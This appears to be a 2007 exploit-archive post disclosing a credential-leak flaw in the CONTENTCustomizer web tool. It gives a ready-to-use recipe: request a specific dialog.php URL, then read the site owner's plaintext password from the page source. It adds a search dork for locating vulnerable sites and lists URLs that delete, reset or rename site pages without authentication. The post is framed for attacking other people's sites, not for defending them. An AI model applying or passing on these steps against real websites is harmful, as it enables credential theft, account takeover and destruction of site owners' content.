contentcustom-disclose.txt
Posted on 26 October 2007
CONTENTCustomizer <= v 3.1mp Login Credentials Disclosure Vulnerability --------------------------------------- Author: d3hydr8 Homepage: darkc0de.com Original Post: forum.darkc0de.com --------------------------------------- Software: CONTENTCustomizer Homepage: contentcustomizer.net Version: <= v 3.1mp Vuln Page: /dialog.php?action=editauthor&doc='+pagename Method: Find a site using ContentCustomizer, get a page name you want to edit. (index.php) Fill it in with our Vuln Page " http://example.com/generator/dialog.php?action=editauthor&doc=index.php" In the form you will see the Username: (owner of the file) but the password is in asterisk's, View Source The password will be in the value= field in plaintext. <td nowrap><input type=password name=newlocalpassword value="PASSWORD" id=newlocalpassword style="width:160px;"></td> Trick: Hit Ctrl+Y on a page that ContentCustomizer controls and it brings you to the login screen ;) Dork: inurl:"generator/default.php?doc=" Other fun stuff: dialog.php?action=del&doc='+pagename // Delete dialog.php?action=delbackup&doc='+pagename // Delete Backup dialog.php?action=res&doc='+pagename // Reset dialog.php?action=ren&doc='+pagename // Rename